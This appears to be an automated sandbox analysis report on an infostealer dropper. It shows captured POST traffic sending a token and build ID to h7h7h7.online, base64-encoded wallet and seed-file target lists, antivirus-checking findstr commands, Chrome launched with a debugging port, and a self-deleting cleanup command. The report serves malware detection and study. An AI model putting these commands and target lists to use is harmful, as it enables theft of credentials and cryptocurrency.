                                                                                                                                                                                                                                                              2024-12-31 20:40:39 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                              Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
24  192.168.2.4  49779  116.203.13.109  443  7740  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp  Bytes transferred  Direction  Data
2024-12-31 20:40:40 UTC  278  OUT  POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----dba168gln7qieuaaiwbi
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:40 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 64 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 64 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------dba168gln7qieuaaiwbiContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------dba168gln7qieuaaiwbiContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------dba168gln7qieuaaiwbiCont
2024-12-31 20:40:40 UTC  158  IN  HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:40 UTC1524INData Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                              Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49781 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:41 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----6x4wtrim79h47qiw4wt0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:41 UTC | 453 | OUT | Data Ascii: ------6x4wtrim79h47qiw4wt0Content-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------6x4wtrim79h47qiw4wt0Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------6x4wtrim79h47qiw4wt0Cont
2024-12-31 20:40:42 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-31 20:40:42 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49788 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:45 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7y5pzmohvs0rimglnym7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:45 UTC | 331 | OUT | Data Ascii: ------7y5pzmohvs0rimglnym7Content-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------7y5pzmohvs0rimglnym7Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------7y5pzmohvs0rimglnym7Cont
2024-12-31 20:40:46 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-31 20:40:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49799 | 116.203.13.109 | 443 | 7740 | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
Timestamp | Bytes transferred | Direction | Data
2024-12-31 20:40:46 UTC | 278 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----us0zcbs26pzcjmoppph4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Host: h7h7h7.online
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-31 20:40:46 UTC | 331 | OUT | Data Ascii: ------us0zcbs26pzcjmoppph4Content-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------us0zcbs26pzcjmoppph4Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------us0zcbs26pzcjmoppph4Cont
2024-12-31 20:40:47 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Tue, 31 Dec 2024 20:40:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-31 20:40:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                                              Start time:15:39:44
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\CenteredDealing.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\CenteredDealing.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:1'203'969 bytes
                                                                                                                                                                                                                                                              MD5 hash:228E734F246564BB255B68D51BD6D31E
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                                                                              Start time:15:39:45
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmd
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                                              Has exited:true

Target ID:2
Start time:15:39:45
Start date:31/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:3
Start time:15:39:47
Start date:31/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0x680000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:15:39:47
Start date:31/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /I "opssvc wrsa"
Imagebase:0x980000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:15:39:47
Start date:31/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0x680000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:15:39:47
Start date:31/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:0x980000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:15:39:47
Start date:31/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c md 208639
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:15:39:47
Start date:31/12/2024
Path:C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):true
Commandline:extrac32 /Y /E Dodge
Imagebase:0x750000
File size:29'184 bytes
MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:9
Start time:15:39:48
Start date:31/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /V "Borough" Architecture
Imagebase:0x980000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:15:39:48
Start date:31/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.com
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:11
                                                                                                                                                                                                                                                              Start time:15:39:48
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson d
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:12
                                                                                                                                                                                                                                                              Start time:15:39:48
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:Rip.com d
                                                                                                                                                                                                                                                              Imagebase:0xf00000
                                                                                                                                                                                                                                                              File size:947'288 bytes
                                                                                                                                                                                                                                                              MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:13
                                                                                                                                                                                                                                                              Start time:15:39:48
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                              Imagebase:0x3b0000
                                                                                                                                                                                                                                                              File size:28'160 bytes
                                                                                                                                                                                                                                                              MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:17
                                                                                                                                                                                                                                                              Start time:15:40:15
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:19
                                                                                                                                                                                                                                                              Start time:15:40:16
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2248,i,8807016753924455708,494945956636832541,262144 /prefetch:8
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:20
                                                                                                                                                                                                                                                              Start time:15:40:47
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8ycbs" & exit
                                                                                                                                                                                                                                                              Imagebase:0x240000
                                                                                                                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                              Start time:15:40:47
                                                                                                                                                                                                                                                              Start date:31/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:22
Start time:15:40:47
Start date:31/12/2024
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:timeout /t 10
Imagebase:0xab0000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Execution Graph

Execution Coverage:17.8%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:20.6%
Total number of Nodes:1523
Total number of Limit Nodes:35
3833->3836 3837 4019ca 3833->3837 3838 40176e 3833->3838 3839 401650 3833->3839 3840 4017b1 3833->3840 3841 401672 3833->3841 3842 401693 3833->3842 3843 401616 3833->3843 3844 4016d6 3833->3844 3845 401736 3833->3845 3846 401897 3833->3846 3847 4018db 3833->3847 3848 40163c 3833->3848 3849 4016bd 3833->3849 3833->3912 3862 4062a3 11 API calls 3834->3862 3854 401751 ShowWindow 3835->3854 3855 401758 3835->3855 3859 40145c 18 API calls 3836->3859 3852 40145c 18 API calls 3837->3852 3856 40145c 18 API calls 3838->3856 3879 4062a3 11 API calls 3839->3879 3945 40145c 3840->3945 3857 40145c 18 API calls 3841->3857 3939 401446 3842->3939 3851 40145c 18 API calls 3843->3851 3868 401446 18 API calls 3844->3868 3844->3912 3845->3912 3961 405f51 wsprintfW 3845->3961 3858 40145c 18 API calls 3846->3858 3863 40145c 18 API calls 3847->3863 3853 401647 PostQuitMessage 3848->3853 3848->3912 3850 4062a3 11 API calls 3849->3850 3865 4016c7 SetForegroundWindow 3850->3865 3866 40161c 3851->3866 3867 4019d1 SearchPathW 3852->3867 3853->3912 3854->3855 3869 401765 ShowWindow 3855->3869 3855->3912 3870 401775 3856->3870 3871 401678 3857->3871 3872 40189d 3858->3872 3873 401968 GetFullPathNameW 3859->3873 3862->3912 3864 4018e2 3863->3864 3876 40145c 18 API calls 3864->3876 3865->3912 3877 4062a3 11 API calls 3866->3877 3867->3912 3868->3912 3869->3912 3880 4062a3 11 API calls 3870->3880 3881 4062a3 11 API calls 3871->3881 3957 4062d5 FindFirstFileW 3872->3957 3883 40197f 3873->3883 3925 4019a1 3873->3925 3875 40169a 3942 4062a3 lstrlenW wvsprintfW 3875->3942 3886 4018eb 3876->3886 3887 401627 3877->3887 3888 401664 3879->3888 3889 401785 SetFileAttributesW 3880->3889 3890 401683 3881->3890 3907 4062d5 2 API calls 3883->3907 3883->3925 3884 4062a3 11 API calls 3892 4017c9 3884->3892 3895 40145c 18 API calls 3886->3895 3896 404f72 25 API calls 3887->3896 3897 40139d 65 API calls 3888->3897 3898 40179a 3889->3898 3889->3912 3905 404f72 25 API calls 3890->3905 3950 405d59 CharNextW 
CharNextW 3892->3950 3894 4019b8 GetShortPathNameW 3894->3912 3903 4018f5 3895->3903 3896->3912 3897->3912 3904 4062a3 11 API calls 3898->3904 3899 4018c2 3908 4062a3 11 API calls 3899->3908 3900 4018a9 3906 4062a3 11 API calls 3900->3906 3910 4062a3 11 API calls 3903->3910 3904->3912 3905->3912 3906->3912 3911 401991 3907->3911 3908->3912 3909 4017d4 3913 401864 3909->3913 3916 405d06 CharNextW 3909->3916 3934 4062a3 11 API calls 3909->3934 3914 401902 MoveFileW 3910->3914 3911->3925 3960 406009 lstrcpynW 3911->3960 3912->3830 3913->3890 3915 40186e 3913->3915 3917 401912 3914->3917 3918 40191e 3914->3918 3919 404f72 25 API calls 3915->3919 3921 4017e6 CreateDirectoryW 3916->3921 3917->3890 3923 401942 3918->3923 3928 4062d5 2 API calls 3918->3928 3924 401875 3919->3924 3921->3909 3922 4017fe GetLastError 3921->3922 3926 401827 GetFileAttributesW 3922->3926 3927 40180b GetLastError 3922->3927 3933 4062a3 11 API calls 3923->3933 3956 406009 lstrcpynW 3924->3956 3925->3894 3925->3912 3926->3909 3930 4062a3 11 API calls 3927->3930 3931 401929 3928->3931 3930->3909 3931->3923 3936 406c68 42 API calls 3931->3936 3932 401882 SetCurrentDirectoryW 3932->3912 3935 40195c 3933->3935 3934->3909 3935->3912 3937 401936 3936->3937 3938 404f72 25 API calls 3937->3938 3938->3923 3940 406805 18 API calls 3939->3940 3941 401455 3940->3941 3941->3875 3943 4060e7 9 API calls 3942->3943 3944 4016a7 Sleep 3943->3944 3944->3912 3946 406805 18 API calls 3945->3946 3947 401488 3946->3947 3948 401497 3947->3948 3949 406038 5 API calls 3947->3949 3948->3884 3949->3948 3951 405d76 3950->3951 3952 405d88 3950->3952 3951->3952 3953 405d83 CharNextW 3951->3953 3954 405dac 3952->3954 3955 405d06 CharNextW 3952->3955 3953->3954 3954->3909 3955->3952 3956->3932 3958 4018a5 3957->3958 3959 4062eb FindClose 3957->3959 3958->3899 3958->3900 3959->3958 3960->3925 3961->3912 3962->3820 3963->3641 3964->3665 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 
406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4011 403882 OleUninitialize 3972->4011 3974 406e3b 3973->3974 4015 406009 lstrcpynW 3973->4015 3980 4062d5 2 API calls 3974->3980 4000 406e58 3974->4000 3974->4011 3976 406cf9 3977 406d03 lstrcatW 3976->3977 3978 406d0d 3976->3978 3979 406d13 3977->3979 3981 406751 2 API calls 3978->3981 3983 406d23 lstrcatW 3979->3983 3985 406d2b lstrlenW FindFirstFileW 3979->3985 3982 406e64 3980->3982 3981->3979 3986 406722 3 API calls 3982->3986 3982->4011 3983->3985 3984 4062a3 11 API calls 3984->4011 3985->3974 3990 406d52 3985->3990 3987 406e6e 3986->3987 3989 4062a3 11 API calls 3987->3989 3988 405d06 CharNextW 3988->3990 3991 406e79 3989->3991 3990->3988 3994 406e18 FindNextFileW 3990->3994 4003 406c9b 72 API calls 3990->4003 4010 404f72 25 API calls 3990->4010 4012 4062a3 11 API calls 3990->4012 4013 404f72 25 API calls 3990->4013 4014 406c68 42 API calls 3990->4014 4016 406009 lstrcpynW 3990->4016 4017 405e30 GetFileAttributesW 3990->4017 3992 405e30 2 API calls 3991->3992 3993 406e81 RemoveDirectoryW 3992->3993 3997 406ec4 3993->3997 3998 406e8d 3993->3998 3994->3990 3996 406e30 FindClose 3994->3996 3996->3974 3999 404f72 25 API calls 3997->3999 3998->4000 4001 406e93 3998->4001 3999->4011 4000->3984 4002 4062a3 11 API calls 4001->4002 4004 406e9d 4002->4004 4003->3990 4006 404f72 25 API calls 4004->4006 4008 406ea7 4006->4008 4009 406c68 42 API calls 4008->4009 4009->4011 4010->3994 4011->3491 4011->3492 4012->3990 4013->3990 4014->3990 4015->3976 4016->3990 4018 405e4d DeleteFileW 4017->4018 4019 405e3f SetFileAttributesW 4017->4019 4018->3990 4019->4018 4020->3697 4021->3697 4022->3684 4024 406ae7 GetShortPathNameW 4023->4024 4025 406abe 4023->4025 4026 406b00 4024->4026 4027 406c62 4024->4027 4049 405e50 GetFileAttributesW CreateFileW 4025->4049 4026->4027 4029 406b08 WideCharToMultiByte 4026->4029 4027->3704 
